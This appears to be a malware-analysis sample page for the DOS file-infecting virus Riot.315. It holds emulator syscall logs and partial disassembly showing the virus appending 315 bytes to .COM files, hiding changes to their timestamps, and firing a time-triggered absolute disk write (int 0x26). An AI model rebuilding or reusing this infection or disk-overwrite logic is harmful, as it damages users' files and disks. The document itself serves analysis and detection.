Sample viewer

vx.netlux.org/Virus.DOS.Riot.315

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:09:48.005789032Z 26 PC: 12a85 | Set disk transfer address
2018-12-17T22:09:48.007651109Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.016870254Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-17T22:09:48.023814482Z 78 PC: 12a94 | Find first file
2018-12-17T22:09:48.030732077Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.047107877Z 61 PC: 12acb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:09:48.053867704Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.057003454Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.063104085Z 66 PC: 12aef | Move file pointer
2018-12-17T22:09:48.064260351Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:09:48.06596492Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.072338027Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.07343925Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.077518475Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.079400599Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.084209828Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.086063016Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.092829298Z 61 PC: 12acb | Open file (Filename = 'PRINT.COM')
2018-12-17T22:09:48.096908333Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.09803859Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.10260373Z 66 PC: 12aef | Move file pointer
2018-12-17T22:09:48.104015676Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:09:48.105617456Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.11098832Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.112029471Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.113749194Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.115361566Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.120117102Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.121973796Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.13115622Z 61 PC: 12acb | Open file (Filename = 'HELLO.COM')
2018-12-17T22:09:48.13862606Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.140188097Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.144390469Z 66 PC: 12aef | Move file pointer
2018-12-17T22:09:48.145915652Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:09:48.147644415Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.149877909Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.151535974Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.153453081Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.155535151Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.160424229Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.162351889Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.168460334Z 61 PC: 12acb | Open file (Filename = 'PHANG.COM')
2018-12-17T22:09:48.173276839Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.174427973Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.178429043Z 66 PC: 12aef | Move file pointer
2018-12-17T22:09:48.180019362Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:09:48.18153001Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.183417361Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.184948237Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.187337838Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.189057668Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.197382411Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.200394355Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.21323154Z 61 PC: 12acb | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:09:48.221152417Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.222863909Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.229276823Z 66 PC: 12aef | Move file pointer
2018-12-17T22:09:48.231761493Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:09:48.23431909Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.237424043Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.23975958Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.24263113Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.24435513Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.252903557Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.255658039Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.265622074Z 61 PC: 12acb | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:09:48.27335451Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.275134255Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.281422837Z 66 PC: 12aef | Move file pointer
2018-12-17T22:09:48.284452409Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:09:48.286910607Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.295311936Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.297891444Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.305188715Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.30713333Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.316148504Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.319173915Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.329019968Z 61 PC: 12acb | Open file (Filename = 'PAH.COM')
2018-12-17T22:09:48.335659661Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.338049152Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.3444693Z 66 PC: 12aef | Move file pointer
2018-12-17T22:09:48.346004231Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:09:48.349215327Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.352199067Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.353529854Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.357941204Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.35967363Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.367406514Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.371265721Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.381042854Z 61 PC: 12acb | Open file (Filename = 'TEST.COM')
2018-12-17T22:09:48.388196637Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.391012868Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.397357166Z 66 PC: 12aef | Move file pointer
2018-12-17T22:09:48.398718386Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-17T22:09:48.40235219Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.410485905Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.41216469Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.419534665Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.421252855Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.42962116Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.433000433Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2
0x12aa4: ja 0x12aaf
0x12aa6: mov al, 2
0x12aa8: mov cx, 0x4d2
0x12aab: cdq
0x12aac: int 0x26
0x12aae: popf
0x12aaf: mov dx, 0x80
0x12ab2: mov ah, 0x1a
0x12ab4: int 0x21
0x12ab6: mov di, 0x100
0x12ab9: push di
0x12aba: ret
0x12abb: lea dx, word ptr [bp + 0x259]
0x12abf: mov ax, 0x4301
0x12ac2: xor cx, cx
0x12ac4: int 0x21
0x12ac6: mov ax, 0x3d02
0x12ac9: int 0x21
0x12acb: jb 0x12b23
2018-12-17T22:09:48.435400954Z 26 PC: 12ab6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2213,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:08.842852689Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T11:45:08.844666759Z 67 PC: 12ac6 | Get or set file attributes
2018-12-25T11:45:08.853650781Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T11:45:08.860117609Z 78 PC: 12a94 | Find first file
2018-12-25T11:45:08.866956779Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:08.882443589Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:08.886486753Z 87 PC: 12ad3 | Get or set file date and time
2018-12-25T11:45:08.887605397Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:45:08.891804936Z 66 PC: 12aef | Move file pointer
2018-12-25T11:45:08.892774047Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-25T11:45:08.894183981Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-25T11:45:08.900683769Z 66 PC: 12b0d | Move file pointer
2018-12-25T11:45:08.902552126Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:45:08.909595279Z 87 PC: 12b1f | Get or set file date and time
2018-12-25T11:45:08.912352771Z 62 PC: 12b23 | Close file
2018-12-25T11:45:08.919899823Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:08.922705748Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:08.932729255Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:08.939154302Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:08.940344841Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:08.94725946Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:08.94873502Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:08.950860197Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:08.954724037Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:08.956019464Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:08.958465153Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:08.960027966Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:08.967564005Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:08.970197911Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:08.980040101Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:08.987383426Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:08.988670209Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:08.994871857Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:08.996561979Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:08.99914333Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.00222813Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.004875517Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.007643692Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.009380697Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.017967091Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.020573494Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.101936165Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.10905089Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.110677631Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.11752752Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.119954754Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.122159292Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.126988567Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.130013218Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.132845808Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.134572246Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.198246216Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.201199183Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.248221187Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.256094657Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.257613163Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.26428982Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.26582639Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.268557041Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.2713491Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.273243471Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.277639688Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.279459269Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.353487221Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.35704383Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.367319398Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.374343414Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.376948155Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.38344741Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.385540881Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.388960698Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.397204655Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.398827417Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.406876811Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.408534933Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.416632743Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.419927401Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.429821969Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.437127046Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.439764873Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.447011251Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.448387342Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.450697214Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.454431475Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.456101951Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.459343092Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.461461079Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.473517755Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.477042236Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.487089196Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.494119603Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.495934335Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.498858267Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.500289046Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.502675731Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.511059486Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.512398088Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.51930637Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.521549589Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.529143088Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.531617069Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2
0x12aa4: ja 0x12aaf
0x12aa6: mov al, 2
0x12aa8: mov cx, 0x4d2
0x12aab: cdq
0x12aac: int 0x26
0x12aae: popf
0x12aaf: mov dx, 0x80
0x12ab2: mov ah, 0x1a
0x12ab4: int 0x21
0x12ab6: mov di, 0x100
0x12ab9: push di
0x12aba: ret
0x12abb: lea dx, word ptr [bp + 0x259]
0x12abf: mov ax, 0x4301
0x12ac2: xor cx, cx
0x12ac4: int 0x21
0x12ac6: mov ax, 0x3d02
0x12ac9: int 0x21
0x12acb: jb 0x12b23
2018-12-25T11:45:09.534056656Z 26 PC: 12ab6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":2213,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:08.940122777Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T11:45:08.941691062Z 67 PC: 12ac6 | Get or set file attributes
2018-12-25T11:45:08.950567196Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T11:45:08.956987309Z 78 PC: 12a94 | Find first file
2018-12-25T11:45:08.985642552Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.00061517Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.016524875Z 87 PC: 12ad3 | Get or set file date and time
2018-12-25T11:45:09.018599855Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:45:09.024017832Z 66 PC: 12aef | Move file pointer
2018-12-25T11:45:09.025083906Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
0x12afc: je 0x12af6
0x12afe: mov word ptr [bp + 0x10e], bx
0x12b02: call 0x22a50
0x12b05: mov ax, 0x4200
0x12b08: sub cx, cx
0x12b0a: cdq
0x12b0b: int 0x21
0x12b0d: mov ah, 0x40
0x12b0f: mov cx, 4
0x12b12: lea dx, word ptr [bp + 0x233]
0x12b16: int 0x21
0x12b18: pop dx
0x12b19: pop cx
0x12b1a: mov ax, 0x5701
0x12b1d: int 0x21
0x12b1f: mov ah, 0x3e
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx
2018-12-25T11:45:09.026577138Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-25T11:45:09.147065318Z 66 PC: 12b0d | Move file pointer
2018-12-25T11:45:09.14819209Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:45:09.152374366Z 87 PC: 12b1f | Get or set file date and time
2018-12-25T11:45:09.154681749Z 62 PC: 12b23 | Close file
2018-12-25T11:45:09.353673746Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.356464325Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.367484154Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.374423964Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.376337193Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.38441808Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.386084718Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.388544325Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.392587663Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.394294524Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.39717006Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.400204749Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.408034217Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.411044816Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.421930365Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.429028583Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.430856871Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.438283144Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.439741123Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.44185863Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.445627199Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.447444297Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.450505241Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.452389988Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.460605098Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.463535072Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.474152442Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.480535054Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.481794955Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.48784101Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.489222849Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.49124413Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.493802199Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.495884417Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.498608625Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.500228822Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.507645676Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.510127893Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.519386083Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.531476166Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.533443413Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.540369572Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.542571095Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.544753992Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.547473767Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.549391145Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.551853311Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.553228801Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.560728882Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.563262505Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.572522397Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.579732262Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.58100391Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.587168296Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.589942144Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.593187Z 64 PC: 12a5e | Write file or device (See above)
